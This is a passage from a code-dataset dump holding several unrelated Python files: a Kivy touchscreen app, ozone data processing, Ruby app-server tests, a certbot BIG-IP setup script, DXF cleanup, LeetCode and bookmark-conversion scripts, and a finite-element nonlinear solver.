a):\r\n self.exit_target1.color = (r, g, b, a)\r\n self.exit_target2.color = (r, g, b, a)\r\n self.target1.color = (r, g, b, a)\r\n self.target2.color = (r, g, b, a)\r\n self.button1_out.color = (r, g, b, a)\r\n self.button1_in.color = (r, g, b, a)\r\n self.button2_out.color = (r, g, b, a)\r\n self.button2_in.color = (r, g, b, a)\r\n self.button3_out.color = (r, g, b, a)\r\n self.button3_in.color = (r, g, b, a)\r\n self.button4_out.color = (r, g, b, a)\r\n self.button4_in.color = (r, g, b, a)\r\n self.button5_out.color = (r, g, b, a)\r\n self.button5_in.color = (r, g, b, a)\r\n self.button6_out.color = (r, g, b, a)\r\n self.button6_in.color = (r, g, b, a)\r\n self.button7_out.color = (r, g, b, a)\r\n self.button7_in.color = (r, g, b, a)\r\n self.button8_out.color = (r, g, b, a)\r\n self.button8_in.color = (r, g, b, a)\r\n self.button9_out.color = (r, g, b, a)\r\n self.button9_in.color = (r, g, b, a)\r\n self.button10_out.color = (r, g, b, a)\r\n self.button10_in.color = (r, g, b, a)\r\n self.button11_out.color = (r, g, b, a)\r\n self.button11_in.color = (r, g, b, a)\r\n self.button12_out.color = (r, g, b, a)\r\n self.button12_in.color = (r, g, b, a)\r\n self.button13_out.color = (r, g, b, a)\r\n self.button13_in.color = (r, g, b, a)\r\n self.button14_out.color = (r, g, b, a)\r\n self.button14_in.color = (r, g, b, a)\r\n self.button15_out.color = (r, g, b, a)\r\n self.button15_in.color = (r, g, b, a)\r\n self.button16_out.color = (r, g, b, a)\r\n self.button16_in.color = (r, g, b, a)\r\n \r\n \r\n \r\nclass Splash(Widget):\r\n def init(self, *args):\r\n self.args = args\r\n # from sound import Sound\r\n # Sound.volume_max() \r\n \r\nclass Target(Widget):\r\n color = ListProperty([0., 0., 0., 1.])\r\n\r\n def set_size(self, size):\r\n size_pix = [cm2pix(size), cm2pix(size)]\r\n self.size=size_pix\r\n\r\n def move(self, pos):\r\n # Convert cm to pixels\r\n pos_pix = cm2pix(pos).astype(int)\r\n pos_pix_int = tuple((int(pos_pix[0]), int(pos_pix[1])))\r\n self.center = pos_pix_int\r\n \r\n \r\nclass Manager(ScreenManager):\r\n pass \r\n \r\n \r\nclass SequenceApp(App):\r\n def build(self, **kwargs):\r\n if platform == 'darwin':\r\n screenx = 1800\r\n screeny = 1000\r\n elif platform =='win32':\r\n from win32api import GetSystemMetrics\r\n screenx = GetSystemMetrics(0)\r\n screeny = GetSystemMetrics(1)\r\n \r\n Window.size = (1800, 1000)\r\n Window.left = (screenx - 1800)/2\r\n Window.top = (screeny - 1000)/2\r\n return Manager() \r\n \r\ndef cm2pix(pos_cm, fixed_window_size=fixed_window_size, 
pix_per_cm=pix_per_cm):\r\n # Convert from CM to pixels: \r\n pix_pos = pix_per_cm*pos_cm\r\n\r\n if type(pix_pos) is np.ndarray:\r\n # Translate to coordinate system w/ 0, 0 at bottom left\r\n pix_pos[0] = pix_pos[0] #+ (fixed_window_size[0]/2.)\r\n pix_pos[1] = pix_pos[1] #+ (fixed_window_size[1]/2.)\r\n\r\n return pix_pos \r\n \r\ndef pix2cm(pos_pix, fixed_window_size=fixed_window_size, pix_per_cm=pix_per_cm):\r\n # First shift coordinate system: \r\n pos_pix[0] = pos_pix[0] #- (fixed_window_size[0]/2.)\r\n pos_pix[1] = pos_pix[1] #- (fixed_window_size[1]/2.)\r\n\r\n pos_cm = pos_pix*(1./pix_per_cm)\r\n return pos_cm \r\n \r\ndef reset():\r\n import kivy.core.window as window\r\n from kivy.base import EventLoop\r\n if not EventLoop.event_listeners:\r\n from kivy.cache import Cache\r\n window.Window = window.core_select_lib('window', window.window_impl, True)\r\n Cache.print_usage()\r\n for cat in Cache._categories:\r\n Cache._objects[cat] = {}\r\n\r\nif __name__ == '__main__':\r\n # reset()\r\n SequenceApp().run()\r\n","sub_path":"touchscreen_co/Touchscreen/SeqHikosaka/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":60560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"265440698","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nfrom pandas import Series, DataFrame\nfrom datetime import datetime\nimport time\nimport math\n\n\n#
Process the 2014-2018 pollutant data into hourly ozone averages
\n\n# In[ ]:\n\n\nyear_list = np.arange(2014, 2018).tolist()\nfor year in year_list:\n #Importing Data\n filename = \"/project/lindner/moving/summer2018/Pollutant_Data/{}_data_ibh.csv\".format(year)\n original_data = pd.read_csv(filename, low_memory=False, nrows=10)\n #Below use when ready \n #original_data = pd.read_csv(filename, low_memory=False)\n try:\n original_data = original_data.drop('Unnamed: 0', axis = 1)\n except:\n pass\n data=pd.DataFrame()\n data['time'] = pd.to_datetime(original_data['epoch'], unit='s').dt.time\n data['date'] = pd.to_datetime(original_data['epoch'], unit='s').dt.date\n data['day'] = pd.to_datetime(original_data['epoch'], unit='s').dt.day\n data['month'] = pd.to_datetime(original_data['epoch'], unit='s').dt.month\n data['year'] = pd.to_datetime(original_data['epoch'], unit='s').dt.year\n data['hour'] = pd.to_datetime(original_data['epoch'], unit='s').dt.hour\n\n #List of epoch times\n epoch_start = original_data['epoch'].unique().min()\n epoch_end = original_data['epoch'].unique().max()\n epoch_list = list(np.arange(epoch_start, epoch_end+300, 300))\n\n #import available sites data\n site_data = pd.read_csv(\"Valid_sites.csv\")\n site_list = list(site_data['O3'].dropna())\n\n try:\n site_data = site_data.drop('Unnamed: 0', axis = 1)\n except:\n pass\n\n #conversion of data\n sample_data = original_data\n data['epoch'] = epoch_list\n data.set_index('epoch', inplace=True)\n data['site'] = original_data['siteID']\n data['o3']=original_data['o3']\n data['temp']=original_data['temp']\n data['wind_x_dir'] = original_data['windspd'] * np.cos(original_data['winddir']*(np.pi/180))\n data['wind_y_dir'] = original_data['windspd'] * np.sin(original_data['winddir']*(np.pi/180))\n data_hour = data.groupby(['year','month','day', 'hour'], as_index=False).mean()\n data_hour = data.groupby(['year','month','day', 'hour'], as_index=False).mean()\n data_hour.to_csv('{}_ozone_hourly_ds3.csv'.format(year))\n\n","sub_path":"python-scripts/Ozone Formatting (Valid Data Conversion).py","file_name":"Ozone Formatting (Valid Data Conversion).py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"598608094","text":"import unittest\nimport unit\n\nclass TestUnitRubyApplication(unit.TestUnitApplicationRuby):\n\n def setUpClass():\n unit.TestUnit().check_modules('ruby')\n\n def test_ruby_application(self):\n self.load('variables')\n\n body = 'Test body string.'\n\n resp = self.post(headers={\n 'Host': 'localhost',\n 'Content-Type': 'text/html',\n 'Custom-Header': 'blah'\n }, body=body)\n\n self.assertEqual(resp['status'], 200, 'status')\n headers = resp['headers']\n header_server = headers.pop('Server')\n self.assertRegex(header_server, r'Unit/[\\d\\.]+', 'server header')\n self.assertEqual(headers.pop('Server-Software'), header_server,\n 'server software header')\n\n date = headers.pop('Date')\n self.assertEqual(date[-4:], ' GMT', 'date header timezone')\n self.assertLess(abs(self.date_to_sec_epoch(date) - self.sec_epoch()), 5,\n 'date header')\n\n self.assertDictEqual(headers, {\n 'Content-Length': str(len(body)),\n 'Content-Type': 'text/html',\n 'Request-Method': 'POST',\n 'Request-Uri': '/',\n 'Http-Host': 'localhost',\n 'Server-Protocol': 'HTTP/1.1',\n 'Custom-Header': 'blah',\n 'Rack-Version': '13',\n 'Rack-Url-Scheme': 'http',\n 'Rack-Multithread': 'false',\n 'Rack-Multiprocess': 'true',\n 'Rack-Run-Once': 'false',\n 'Rack-Hijack-Q': 'false',\n 'Rack-Hijack': '',\n 'Rack-Hijack-IO': ''\n }, 
'headers')\n self.assertEqual(resp['body'], body, 'body')\n\n def test_ruby_application_query_string(self):\n self.load('query_string')\n\n resp = self.get(url='/?var1=val1&var2=val2')\n\n self.assertEqual(resp['headers']['Query-String'], 'var1=val1&var2=val2',\n 'Query-String header')\n\n @unittest.expectedFailure\n def test_ruby_application_server_port(self):\n self.load('server_port')\n\n self.assertEqual(self.get()['headers']['Server-Port'], '7080',\n 'Server-Port header')\n\n def test_ruby_application_status_int(self):\n self.load('status_int')\n\n self.assertEqual(self.get()['status'], 200, 'status int')\n\n def test_ruby_application_input_read_empty(self):\n self.load('input_read_empty')\n\n self.assertEqual(self.get()['body'], '', 'read empty')\n\n def test_ruby_application_input_read_parts(self):\n self.load('input_read_parts')\n\n self.assertEqual(self.post(body='0123456789')['body'], '012345678',\n 'input read parts')\n\n def test_ruby_application_input_read_buffer(self):\n self.load('input_read_buffer')\n\n self.assertEqual(self.post(body='0123456789')['body'], '0123456789',\n 'input read buffer')\n\n def test_ruby_application_input_read_buffer_not_empty(self):\n self.load('input_read_buffer_not_empty')\n\n self.assertEqual(self.post(body='0123456789')['body'], '0123456789',\n 'input read buffer not empty')\n\n def test_ruby_application_input_gets(self):\n self.load('input_gets')\n\n body = '0123456789'\n\n self.assertEqual(self.post(body=body)['body'], body, 'input gets')\n\n def test_ruby_application_input_gets_2(self):\n self.load('input_gets')\n\n self.assertEqual(self.post(body='01234\\n56789\\n')['body'], '01234\\n',\n 'input gets 2')\n\n def test_ruby_application_input_gets_all(self):\n self.load('input_gets_all')\n\n body = '\\n01234\\n56789\\n\\n'\n\n self.assertEqual(self.post(body=body)['body'], body, 'input gets all')\n\n def test_ruby_application_input_each(self):\n self.load('input_each')\n\n body = '\\n01234\\n56789\\n\\n'\n\n self.assertEqual(self.post(body=body)['body'], body, 'input each')\n\n @unittest.expectedFailure\n def test_ruby_application_input_rewind(self):\n self.load('input_rewind')\n\n body = '0123456789'\n\n self.assertEqual(self.post(body=body)['body'], body, 'input rewind')\n\n @unittest.expectedFailure\n def test_ruby_application_syntax_error(self):\n self.skip_alerts.extend([\n r'Failed to parse rack script',\n r'syntax error',\n r'new_from_string',\n r'parse_file'\n ])\n self.load('syntax_error')\n\n self.assertEqual(self.get()['status'], 500, 'syntax error')\n\n def test_ruby_application_errors_puts(self):\n self.load('errors_puts')\n\n self.get()\n\n self.stop()\n\n self.assertIsNotNone(\n self.search_in_log(r'\\[error\\].+Error in application'),\n 'errors puts')\n\n def test_ruby_application_errors_puts_int(self):\n self.load('errors_puts_int')\n\n self.get()\n\n self.stop()\n\n self.assertIsNotNone(\n self.search_in_log(r'\\[error\\].+1234567890'),\n 'errors puts int')\n\n def test_ruby_application_errors_write(self):\n self.load('errors_write')\n\n self.get()\n\n self.stop()\n\n self.assertIsNotNone(\n self.search_in_log(r'\\[error\\].+Error in application'),\n 'errors write')\n\n def test_ruby_application_errors_write_to_s_custom(self):\n self.load('errors_write_to_s_custom')\n\n self.assertEqual(self.get()['status'], 200,\n 'errors write to_s custom')\n\n def test_ruby_application_errors_write_int(self):\n self.load('errors_write_int')\n\n self.get()\n\n self.stop()\n\n self.assertIsNotNone(\n 
self.search_in_log(r'\\[error\\].+1234567890'),\n 'errors write int')\n\n def test_ruby_application_at_exit(self):\n self.skip_alerts.append(r'sendmsg.+failed')\n self.load('at_exit')\n\n self.get()\n\n self.conf({\n \"listeners\": {},\n \"applications\": {}\n })\n\n self.stop()\n\n self.assertIsNotNone(\n self.search_in_log(r'\\[error\\].+At exit called\\.'), 'at exit')\n\n def test_ruby_application_header_custom(self):\n self.load('header_custom')\n\n resp = self.post(body=\"\\ntc=one,two\\ntc=three,four,\\n\\n\")\n\n self.assertEqual(resp['headers']['Custom-Header'],\n ['', 'tc=one,two', 'tc=three,four,', '', ''], 'header custom')\n\n @unittest.expectedFailure\n def test_ruby_application_header_custom_non_printable(self):\n self.load('header_custom')\n\n self.assertEqual(self.post(body='\\b')['status'], 500,\n 'header custom non printable')\n\n def test_ruby_application_header_status(self):\n self.load('header_status')\n\n self.assertEqual(self.get()['status'], 200, 'header status')\n\n @unittest.expectedFailure\n def test_ruby_application_header_rack(self):\n self.load('header_rack')\n\n self.assertEqual(self.get()['status'], 500, 'header rack')\n\n def test_ruby_application_body_empty(self):\n self.load('body_empty')\n\n self.assertEqual(self.get()['body'], '0\\r\\n\\r\\n', 'body empty')\n\n def test_ruby_application_body_array(self):\n self.load('body_array')\n\n self.assertEqual(self.get()['body'], '0123456789', 'body array')\n\n def test_ruby_application_body_large(self):\n self.load('mirror')\n\n body = '0123456789' * 1000\n\n self.assertEqual(self.post(body=body)['body'], body, 'body large')\n\n @unittest.expectedFailure\n def test_ruby_application_body_each_error(self):\n self.load('body_each_error')\n\n self.assertEqual(self.get()['status'], 500, 'body each error status')\n\n self.stop()\n\n self.assertIsNotNone(\n self.search_in_log(r'\\[error\\].+Failed to run ruby script'),\n 'body each error')\n\n def test_ruby_application_body_file(self):\n self.load('body_file')\n\n self.assertEqual(self.get()['body'], 'body\\n', 'body file')\n\n def test_ruby_keepalive_body(self):\n self.load('mirror')\n\n (resp, sock) = self.post(headers={\n 'Connection': 'keep-alive',\n 'Content-Type': 'text/html',\n 'Host': 'localhost'\n }, start=True, body='0123456789' * 500)\n\n self.assertEqual(resp['body'], '0123456789' * 500, 'keep-alive 1')\n\n resp = self.post(headers={\n 'Connection': 'close',\n 'Content-Type': 'text/html',\n 'Host': 'localhost'\n }, sock=sock, body='0123456789')\n\n self.assertEqual(resp['body'], '0123456789', 'keep-alive 2')\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/test_ruby_application.py","file_name":"test_ruby_application.py","file_ext":"py","file_size_in_byte":8530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"515866223","text":"import sys\n\nfrom setuptools import setup\nfrom setuptools import find_packages\n\nversion = '0.0.1'\n\ninstall_requires = [\n 'f5-icontrol-rest',\n]\n\ndef read_file(filename, encoding='utf8'):\n \"\"\"Read unicode from given file.\"\"\"\n with codecs.open(filename, encoding=encoding) as fd:\n return fd.read()\n\nhere = os.path.abspath(os.path.dirname(__file__))\nreadme = read_file(os.path.join(here, 'README.rst'))\n\ninstall_requires = [\n 'certbot-bigip',\n 'letsencrypt=={0}'.format(version),\n]\n\nsetup(\n name='certbot-bigip',\n version=version,\n description='F5 BIG-IP plugin for Certbot',\n url='https://github.com/colin-stubbs/certbot-bigip',\n 
author='Colin Stubbs',\n author_email='cstubbs@gmail.com',\n license='Apache License 2.0',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Environment :: Plugins',\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Security',\n 'Topic :: System :: Installation/Setup',\n 'Topic :: System :: Networking',\n 'Topic :: System :: Systems Administration',\n 'Topic :: Utilities',\n ],\n\n packages=find_packages(),\n include_package_data=True,\n install_requires=install_requires,\n)\n","sub_path":"letsencrypt-bigip/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"68714311","text":"# CleanDXF v3.0\n\n# RGB to ACI table here: https://gohtx.com/acadcolors.php\n\nfrom collections import namedtuple\nimport ezdxf, sys\n\nfrom ezdxf.layouts.layout import Modelspace\n\nif len(sys.argv) < 2: exit() # Exit when there is no file\n\n\ndef main():\n\n for file in sys.argv[1:]:\n\n doc = ezdxf.readfile(file)\n msp = doc.modelspace()\n\n entities = Entities(msp)\n query = entities.query()\n\n Entities.delete(query.bend)\n Entities.delete(query.dims)\n\n doc.save()\n\n\nclass Entities:\n\n def __init__(self, msp) -> None: \n self.msp = msp\n\n def query(self):\n \n Query = namedtuple(\"Entities\", [\"bend\", \"dims\"]) \n\n # Query all entities on a layer named BEND\n bend_lines = self.msp.query('*[layer==\"BEND\"]')\n\n # Add entities on a layer named BEND_EXTENT\n bend_lines.extend('*[layer==\"BEND_EXTENT\"]')\n\n # Query all pink entities (255,0,255)\n dimensions = self.msp.query('*[color==6]')\n\n return Query(\n bend_lines,\n dimensions,\n )\n\n\n def delete(self, entities):\n\n for entity in entities: self.msp.delete_entity(entity)\n\nif __name__ == '__main__':\n main()","sub_path":"CleanDXF_v3.py","file_name":"CleanDXF_v3.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"440129233","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib\n\n# Look pretty...\n# matplotlib.style.use('ggplot')\nplt.style.use('ggplot')\n\nwheat = pd.read_csv(\"C:/Users/mckinns/Documents/GitHub/DAT210x/Module3/Datasets/wheat.data\", \n index_col=0, header=0)\n\ndf_wh = pd.DataFrame(wheat)\ns1 = df_wh[['perimeter', 'area']]\ns2 = df_wh[['groove','asymmetry' ]]\n\ns1.plot.hist(alpha=0.75)\ns2.plot.hist(alpha=0.75)\n\nplt.show()\n\n","sub_path":"LAB3_assignment1.py","file_name":"LAB3_assignment1.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"601926660","text":"import sqlite3\nimport json\nimport urllib.parse as urlparse\nimport sys\nimport datetime\n\n# you know, I should post this in a gist\n\njsonexpt={\n\t\"bookmarks\":[],\n\t\"folders\":[],\n}\n\nif len(sys.argv) == 2:\n\twith sqlite3.connect(sys.argv[1]) as db:\n\t\tdb.row_factory = sqlite3.Row\n\t\tc = db.cursor()\n\t\tget_parent_c = db.cursor()\n\n\t\tfor row in c.execute('SELECT * from bookmarks'):\n\t\t\t#print(row, type(row))\n\t\t\tif row['is_folder'] == 0:\n\t\t\t\tbkobj={}\n\t\t\t\tbkobj[\"visitedDate\"]=int(row['date'] / 
1000)\n\t\t\t\tbkobj[\"creationDate\"]=int(row['created'] / 1000)\n\t\t\t\tbkobj[\"visits\"]=row['visits']\n\t\t\t\tbkobj[\"url\"]=urlparse.quote(row['url'])\n\t\t\t\tbkobj[\"title\"]=urlparse.quote(row['title'])\n\t\t\t\tif row['parent_crc_id'] == 0:\n\t\t\t\t\tbkobj[\"folderId\"]=-1\n\t\t\t\telse:\n\t\t\t\t\t#print(row['parent_crc_id'])\n\t\t\t\t\tget_parent_c.execute('SELECT * from bookmarks WHERE crc_id=?', (row['parent_crc_id'],))\n\t\t\t\t\tprow = get_parent_c.fetchone()\n\t\t\t\t\tbkobj[\"folderId\"]=int(prow['_id'])\n\t\t\t\tjsonexpt[\"bookmarks\"].append(bkobj)\n\n\t\t\telse:\n\t\t\t\tbkobj={}\n\t\t\t\tbkobj[\"title\"]=urlparse.quote(row['title'])\n\t\t\t\tif row['parent_crc_id'] == 0:\n\t\t\t\t\tbkobj[\"parentId\"]=-1\n\t\t\t\telse:\n\t\t\t\t\tget_parent_c.execute('SELECT * from bookmarks WHERE crc_id=?', (row['parent_crc_id'],))\n\t\t\t\t\tprow = get_parent_c.fetchone()\n\t\t\t\t\tbkobj[\"parentId\"]=int(prow['_id'])\n\t\t\t\tbkobj[\"title\"]=urlparse.quote(row['title'])\n\t\t\t\tbkobj[\"id\"]=int(row['_id'])\n\t\t\t\tjsonexpt[\"folders\"].append(bkobj)\n\n\twith open(sys.argv[1].replace(\"db\",\"json\"), 'w', encoding='utf-8') as wf:\n\t\tjson.dump(jsonexpt, wf)\n","sub_path":"converters/nextbrowser2tint.py","file_name":"nextbrowser2tint.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"590079137","text":"\"\"\"\nhttps://leetcode.com/problems/making-a-large-island/\n\n1. Check all island, compute the area and index them.\n2. Try to change 0 to 1 one-by-one, check the neighbor islands, compute the area.\n\nTime complexity: O(n^2)\n\"\"\"\nclass Solution:\n def largestIsland(self, grid) -> int:\n N = len(grid)\n def move(x, y):\n for i, j in ((1, 0), (-1, 0), (0, 1), (0, -1)):\n if 0 <= x + i < N and 0 <= y + j < N:\n yield x + i, y + j\n\n def dfs(x, y, index):\n area = 0\n grid[x][y] = index\n for new_x, new_y in move(x, y):\n if grid[new_x][new_y] == 1:\n area += dfs(new_x, new_y, index)\n return area + 1\n\n index = 2\n area = {}\n for x in range(N):\n for y in range(N):\n if grid[x][y] == 1:\n area[index] = dfs(x, y, index)\n index += 1\n\n res = max(area.values() or [0])\n for x in range(N):\n for y in range(N):\n if grid[x][y] == 0:\n possible_idx = set()\n for new_x, new_y in move(x, y):\n if grid[new_x][new_y] > 1:\n possible_idx.add(grid[new_x][new_y])\n res = max(res, sum(area[idx] for idx in possible_idx) + 1)\n\n return res\n\nsol = Solution()\ngrid = [[1, 0], [0, 1]]\nassert sol.largestIsland(grid) == 3\ngrid = [[1, 1], [1, 0]]\nassert sol.largestIsland(grid) == 4\ngrid = [[1, 1], [1, 1]]\nassert sol.largestIsland(grid) == 4\n","sub_path":"0827_MakingALargeIsland.py","file_name":"0827_MakingALargeIsland.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"540003112","text":"# --- Internal Imports ---\r\nfrom .solver import solveLinearSystem\r\n\r\n# --- Python Imports ---\r\nimport numpy as np\r\nimport scipy.sparse as sparse\r\n\r\n# ---------------------------------------------------------\r\ndef newtonIteration( targetSystem,\r\n initialSolution,\r\n tolerance=1e-5,\r\n maxIterations=10,\r\n solverKWArgs={},\r\n verbose=False,\r\n convergencePlot=None ):\r\n '''\r\n Attempts to find a root of a target function, using 1st order linearization.\r\n The target function must return a 1D numpy array, while the target derivative\r\n must return a matching nonsingular square 
numpy ndarray. Both the function and\r\n derivative must expect the initial state (1D numpy array) as argument (and no other\r\n positional arguments).\r\n '''\r\n # Initialize\r\n solution = initialSolution.copy()\r\n functionValue, derivative = targetSystem(solution)\r\n iterationCounter = 1\r\n targetNorm = np.linalg.norm(functionValue)\r\n\r\n if verbose:\r\n print( \"Initial target\\t: %.3E\" % targetNorm )\r\n if convergencePlot is not None:\r\n convergencePlot(targetNorm)\r\n\r\n # Loop\r\n while True:\r\n # Check if iteration limit exceeded\r\n if iterationCounter >= maxIterations:\r\n print( \"Newton iteration failed to converge after %i iterations\" % iterationCounter )\r\n raise StopIteration\r\n\r\n # Step\r\n solution -= solveLinearSystem( derivative, functionValue, **solverKWArgs )\r\n functionValue, derivative = targetSystem(solution)\r\n\r\n # Check convergence\r\n targetNorm = np.linalg.norm(functionValue)\r\n if verbose:\r\n print( \"Target norm\\t: %.3E\" % targetNorm )\r\n if convergencePlot is not None:\r\n convergencePlot(targetNorm)\r\n if targetNorm < tolerance:\r\n break\r\n\r\n iterationCounter += 1\r\n \r\n return solution\r\n\r\n\r\n\r\ndef reintegrate( model, \r\n loadFactor, \r\n solution,\r\n stiffness=True,\r\n load=True,\r\n mass=True,\r\n geometricStiffness=True ):\r\n '''\r\n Function that does all the necessary operations for updating \r\n the model to the current load factor and solution\r\n '''\r\n # Set up arguments for stationary or transient models\r\n keywordArgs = { \"stiffness\" : stiffness,\r\n \"load\" : load,\r\n \"geometricStiffness\" : geometricStiffness }\r\n\r\n if hasattr( model, \"mass\" ):\r\n keywordArgs[\"mass\"] = mass\r\n\r\n # Wipe matrices and set solution function\r\n model.resetMatrices( **keywordArgs )\r\n solutionFunction = lambda x: model.sample(solution, x)\r\n\r\n # Compute structural matrices\r\n model.integrate( solutionFunction, \r\n solution, \r\n **keywordArgs )\r\n\r\n # Apply boundaries\r\n for boundary in model.boundaries:\r\n model.applyBoundaryCondition( boundary )\r\n\r\n\r\n\r\ndef stationaryLoadControl( model,\r\n initialSolution,\r\n baseIncrement=0.5,\r\n minIncrement=0.05,\r\n maxIncrement=1.0,\r\n maxIncrements=50,\r\n maxCorrections=10,\r\n tolerance=1e-5,\r\n verbose=True,\r\n axes=None,\r\n convergencePlot=None ):\r\n '''\r\n Solves a nonlinear FEModel using a load controlled predictor and a constant load corrector\r\n '''\r\n # ---------------------------------------------------------\r\n # Initialize arguments\r\n u = initialSolution.copy()\r\n loadFactors = []\r\n\r\n if convergencePlot is not None:\r\n convergencePlot.start()\r\n\r\n # Define inputs for the Newton iteration\r\n def updateSystem(solution, loadFactor):\r\n reintegrate( model,\r\n loadFactor,\r\n solution,\r\n mass=False)\r\n residual = model.stiffness.dot(solution) - loadFactor*model.load\r\n tangentStiffness = model.stiffness + model.geometricStiffness\r\n return residual, tangentStiffness\r\n\r\n # Initialize structural matrices\r\n reintegrate( model,\r\n 0.0,\r\n initialSolution,\r\n mass=False)\r\n \r\n # ---------------------------------------------------------\r\n # Increment loop\r\n increment = maxIncrement\r\n lastControl = 0.0\r\n control = lastControl + increment\r\n incrementIndex = -1\r\n\r\n while control < 1.0:\r\n\r\n # Update control\r\n incrementIndex += 1\r\n control = lastControl + increment\r\n\r\n if control > 1.0:\r\n control = 1.0\r\n\r\n # Print iteration header\r\n if verbose:\r\n print( \"Increment# \" + 
str(incrementIndex) + \" \" + \"-\"*(35-11-len(str(incrementIndex))-1) )\r\n\r\n # Predict\r\n controlIncrement = control-lastControl\r\n #u += solveLinearSystem( model.stiffness + model.geometricStiffness, controlIncrement * model.load )\r\n uMid = u + 0.5 * solveLinearSystem( model.stiffness + model.geometricStiffness, controlIncrement * model.load )\r\n reintegrate( model, \r\n control, \r\n uMid,\r\n mass=False )\r\n uNew = u + solveLinearSystem( model.stiffness + model.geometricStiffness, controlIncrement * model.load )\r\n\r\n # Correct\r\n try:\r\n uNew = newtonIteration( lambda solution: updateSystem(solution, control),\r\n uNew,\r\n tolerance=tolerance,\r\n maxIterations=maxCorrections,\r\n verbose=True,\r\n convergencePlot=convergencePlot)\r\n except StopIteration:\r\n increment /= 2.0\r\n if increment < minIncrement:\r\n raise RuntimeError( \"Nonlinear iteration failed to converge\" )\r\n continue\r\n\r\n # Update\r\n lastControl = control\r\n u = uNew.copy()\r\n loadFactors.append(control)\r\n\r\n if 2.0*increment < maxIncrement:\r\n increment *= 2.0\r\n\r\n # Plot if requested\r\n if axes is not None:\r\n axes.plot( np.linspace( 0, 1, num=100 ), model.sample( u, np.linspace( 0, 1, num=100 ) ) )\r\n\r\n # ---------------------------------------------------------\r\n # Decorate plot if requested\r\n if axes is not None:\r\n axes.legend( [ \"Control parameter = %.2f\" % l for l in loadFactors ] )\r\n axes.set_xlabel( \"x [m]\" )\r\n axes.set_ylabel( \"T [C]\" )\r\n axes.set_title( \"Temperature Field\" )\r\n\r\n if convergencePlot is not None:\r\n convergencePlot.finish()\r\n \r\n return u\r\n\r\n\r\n\r\n\r\ndef stationaryFixedPointIteration( model,\r\n initialSolution,\r\n loadFactors=None,\r\n maxCorrections=10,\r\n tolerance=1e-5,\r\n verbose=True,\r\n axes=None,\r\n convergencePlot=None ):\r\n '''\r\n Solves a nonlinear FEModel using fixed point iterations\r\n '''\r\n # ---------------------------------------------------------\r\n # Initialize arguments\r\n u = initialSolution\r\n\r\n if loadFactors is None:\r\n loadFactors = np.linspace( 0.0, 1.0, num=5+1 )\r\n\r\n if convergencePlot is not None:\r\n convergencePlot.start()\r\n \r\n # ---------------------------------------------------------\r\n # Increment loop\r\n for incrementIndex, control in enumerate(loadFactors):\r\n\r\n # Print iteration header\r\n if verbose:\r\n print( \"\\nIncrement# \" + str(incrementIndex) + \" \" + \"-\"*(35-11-len(str(incrementIndex))-1) )\r\n\r\n # Check if first run (initialization)\r\n if incrementIndex == 0:\r\n reintegrate( model, \r\n loadFactors[0], \r\n u,\r\n mass=False,\r\n geometricStiffness=False )\r\n continue\r\n\r\n # Correction loop\r\n for correctionIndex in range(maxCorrections):\r\n # Correct\r\n u = solveLinearSystem( model.stiffness, control * model.load )\r\n\r\n # Update residual and check termination criterion\r\n reintegrate( model, \r\n control, \r\n u,\r\n mass=False,\r\n geometricStiffness=False )\r\n residual = model.stiffness.dot(u) - control*model.load\r\n resNorm = np.linalg.norm(residual)\r\n if verbose:\r\n print( \"Current residual\\t: %.3E\" % resNorm )\r\n if convergencePlot is not None:\r\n convergencePlot( resNorm )\r\n if resNorm < tolerance:\r\n break\r\n elif correctionIndex == maxCorrections-1:\r\n print( \"Warning: corrector failed to converge within the specified tolerance\" )\r\n\r\n # Plot if requested\r\n if axes is not None:\r\n axes.plot( np.linspace( 0, 1, num=100 ), model.sample( u, np.linspace( 0, 1, num=100 ) ) )\r\n\r\n # 
---------------------------------------------------------\r\n # Decorate plot if requested\r\n if axes is not None:\r\n axes.legend( [ \"Control parameter = %.2f\" % l for l in loadFactors[1:] ] )\r\n axes.set_xlabel( \"x [m]\" )\r\n axes.set_ylabel( \"T [C]\" )\r\n axes.set_title( \"Temperature Field\" )\r\n\r\n if convergencePlot is not None:\r\n convergencePlot.finish()\r\n \r\n return u\r\n\r\n\r\n\r\n\r\ndef transientResidual( model, \r\n solution, \r\n loadFactor, \r\n massInverse,\r\n theta,\r\n dt,\r\n previousState ):\r\n temp = theta*massInverse.dot(model.stiffness.todense()) + 1.0/dt*np.eye(model.size)\r\n return np.ravel( temp.dot(solution) - theta*massInverse.dot(loadFactor*model.load) + previousState )\r\n\r\n\r\n\r\ndef transientResidualDerivative( model, \r\n solution, \r\n loadFactor, \r\n massInverse, \r\n theta, \r\n dt ):\r\n '''\r\n Compute the derivative of the residual with respect to the solution coefficients.\r\n See the readme for a better view: eq.(23)\r\n '''\r\n # Preallocate\r\n temp = np.zeros(massInverse.shape)\r\n MKu = massInverse.dot( model.stiffness.dot(solution) )\r\n Mq = massInverse.dot(model.load)\r\n temperature = lambda x: model.sample(solution, x)\r\n\r\n # Integrate\r\n for e in model.elements:\r\n 